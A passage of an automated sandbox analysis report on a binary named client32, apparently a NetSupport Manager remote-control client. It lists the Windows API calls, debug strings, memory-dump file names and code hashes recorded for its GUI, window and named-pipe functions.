                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 1107B632
                                                                                                                                                                                                    • GetDlgCtrlID.USER32(00000043), ref: 1107B67F
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B702
                                                                                                                                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 1107B710
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B72B
                                                                                                                                                                                                    • OffsetRect.USER32(?,00000002,00000000), ref: 1107B739
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B754
                                                                                                                                                                                                    • OffsetRect.USER32(?,000000FE,00000002), ref: 1107B762
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B77D
                                                                                                                                                                                                    • OffsetRect.USER32(?,00000002,00000000), ref: 1107B78B
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B7A6
                                                                                                                                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 1107B7B4
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B7C5
                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000043), ref: 1107B7E1
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B7F6
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B80B
                                                                                                                                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 1107B81F
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B83A
                                                                                                                                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 1107B848
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B859
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B8A5
                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 1107B8B3
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B8BB
                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1107B8C9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1107B66E
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1107B669
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: RectText$Offset$ColorDraw$Window$EnabledItemModeObjectSelect$CtrlExtentPoint
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1037719170-2830328467
                                                                                                                                                                                                    • Opcode ID: f12d14fb7baf8ebf126ec1d2fae925ceb7ee556ae07c4c752fb7b4e824a2f397
                                                                                                                                                                                                    • Instruction ID: 3a1015ba9db7ebe9a225c832c9c2fba055e3f61b29bcdc8589afcc457abe4137
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f12d14fb7baf8ebf126ec1d2fae925ceb7ee556ae07c4c752fb7b4e824a2f397
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48025074A002299FDB15CF64CC84FAEB7B5FF49314F108298EA19A7285DB34AE85CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(110055D2), ref: 11087A6C
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(?), ref: 11087A86
                                                                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 11121695
                                                                                                                                                                                                    • RegisterClassA.USER32(00000003), ref: 1112169E
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(111E5C50), ref: 111216F0
                                                                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 11121716
                                                                                                                                                                                                    • RegisterClassA.USER32(00000020), ref: 11121722
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 1112172F
                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 11121761
                                                                                                                                                                                                    • CreateWindowExA.USER32(?,111B3210,00000000,52000000,?,?,?,?,?,00000000,00000000,?), ref: 111217BC
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(User32.dll,View,TouchWidth,00000020,00000000,?,?), ref: 11121806
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 11121887
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 111218A6
                                                                                                                                                                                                    • CreateWindowExA.USER32(?,NSMRemote32,00000000,52300000,?,?,?,?,?,00000000,00000000,?), ref: 111218E1
                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 111218EA
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1112190B
                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 11121919
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 11121922
                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 11121931
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?), ref: 11121966
                                                                                                                                                                                                    • GetActiveWindow.USER32 ref: 11121981
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000001,?,?,?,?,?,?), ref: 111219C8
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ErrorLast$ClassClientCreateLibraryLongObjectRectRegisterStock$ActiveAddressCurrentExitFreeIncrementInterlockedLoadMessageProcProcessThreadwsprintf
                                                                                                                                                                                                    • String ID: $..\ctl32\Remote.cpp$::IsWindow(hWnd)$FullScreen$NSMRemote32$RegisterTouchWindow$Remote!RegisterTouchWindow() failed for touch border, error %d$ScaleToFit$TouchWidth$User32.dll$View$hWndTouch$ok || GetLastError() == 1410
                                                                                                                                                                                                    • API String ID: 3842685962-3599241244
                                                                                                                                                                                                    • Opcode ID: 426ff793d86bd5872fdfd9fcd4fe2d0e4a8183afb80ff5ac1c1571aff371d28e
                                                                                                                                                                                                    • Instruction ID: 400e9730b5ef3912cdd2794fdd6cb887c5493412ee1f0dc17ea482fa534bc219
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 426ff793d86bd5872fdfd9fcd4fe2d0e4a8183afb80ff5ac1c1571aff371d28e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2F103B5E00619AFDB10DFA9C984B9EFBF5BB48304F60856EE519E7240E730A941CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 111390BA
                                                                                                                                                                                                    • GetStockObject.GDI32(00000004), ref: 111390C5
                                                                                                                                                                                                    • RegisterClassA.USER32(?), ref: 111390D9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1113914F
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1113916B
                                                                                                                                                                                                    • CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111391D5
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113923E
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113926D
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 1113929B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111392B6
                                                                                                                                                                                                    • SetTimer.USER32(?,00000081,00000014,00000000), ref: 111392FA
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139304
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139322
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
                                                                                                                                                                                                    • String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$Zv
                                                                                                                                                                                                    • API String ID: 1116282658-1464822714
                                                                                                                                                                                                    • Opcode ID: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
                                                                                                                                                                                                    • Instruction ID: 6cb21f8f8127432fbcbf373ae429d8022df700afa094652b34364ba5c840ba31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D81D575B4030AAFD710DFA5CC85FEEF7B8EB88715F20442DF659A6280E77065408B55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 1107D192
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 1107D1C1
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1107D1CF
                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 1107D238
                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 1107D24C
                                                                                                                                                                                                    • SetBkColor.GDI32(00000000,00E8E8E8), ref: 1107D25E
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1107D3DE
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 1107D3EB
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1107D3F9
                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 1107D415
                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 1107D468
                                                                                                                                                                                                    • DrawTextA.USER32(00000000,?,000000FF,?,00040024), ref: 1107D487
                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 1107D495
                                                                                                                                                                                                    • DrawTextA.USER32(00000000,?,000000FF,?,00040024), ref: 1107D4AE
                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 1107D4D2
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1107D4E6
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1107D4F5
                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 1107D4FF
                                                                                                                                                                                                    • SetBkColor.GDI32(00000000,?), ref: 1107D50D
                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 1107D51B
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1107D529
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1107D532
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 1107D535
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ColorObjectText$Select$CreateDelete$CompatibleDrawMode$BitmapErrorExitFontIndirectInfoLastMessageParametersProcessRectSystemwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$hMem
                                                                                                                                                                                                    • API String ID: 1502936758-2516694766
                                                                                                                                                                                                    • Opcode ID: 36d219e26726848059f52c981c0d14bc7668550830b1415c31726c39383ac83b
                                                                                                                                                                                                    • Instruction ID: 78a9f170916dfafc2dc45aeca8387f828832c0ae4b7178e67d184a542258695a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36d219e26726848059f52c981c0d14bc7668550830b1415c31726c39383ac83b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BD11975A00629AFDB15CF64CC84BEEB7B5AF49304F1081D9E659A7240DB30AE81CF95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1104D870: SetEvent.KERNEL32(?), ref: 1104D927
                                                                                                                                                                                                      • Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D98D
                                                                                                                                                                                                      • Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D99F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1104F394
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 1104F3BD
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1104F3C8
                                                                                                                                                                                                    • SetNamedPipeHandleState.KERNEL32(00000000,00000002,00000000,00000000), ref: 1104F3F5
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,BBC4A55B), ref: 1104F40B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_0003C050,00000001,00000000), ref: 1104F4B5
                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 1104F4C3
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1104F4D7
                                                                                                                                                                                                    • GetPriorityClass.KERNEL32(00000000), ref: 1104F4EC
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1104F4FA
                                                                                                                                                                                                    • GetACP.KERNEL32(View,CacheSize,00000400,00000000), ref: 1104F54E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 1104F55D
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1104F56C
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,00000026), ref: 1104F58A
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 1104F59A
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 1104F5C8
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 1104F5D6
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 1104F5E0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CapsDevice$CloseProcess$CreateEventMetricsSystem$AddressClassCurrentErrorFileLastModuleNamedOpenPipePriorityProcReleaseStateThreadWindowwsprintf
                                                                                                                                                                                                    • String ID: CLTCONN.CPP$CacheSize$Error creating hShowPipe, e=%d$Show enabling mirror$View$\\.\pipe\nsm_ctl32_show_%d$idata->hShowEvent
                                                                                                                                                                                                    • API String ID: 1070019554-2085025582
                                                                                                                                                                                                    • Opcode ID: ab3b9fd2497bccdc1ad2a3eeb3d4d48281e00dd69a0b96e76b26206504cea97d
                                                                                                                                                                                                    • Instruction ID: a762959b66c2b007555d3d1dad52a1717f1328b6c18758764795a7a29e9eccb5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab3b9fd2497bccdc1ad2a3eeb3d4d48281e00dd69a0b96e76b26206504cea97d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD13F74E007169FDB15CF68C888BEEB7F5BB48304F1085ADE96A97284DB74AA40CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
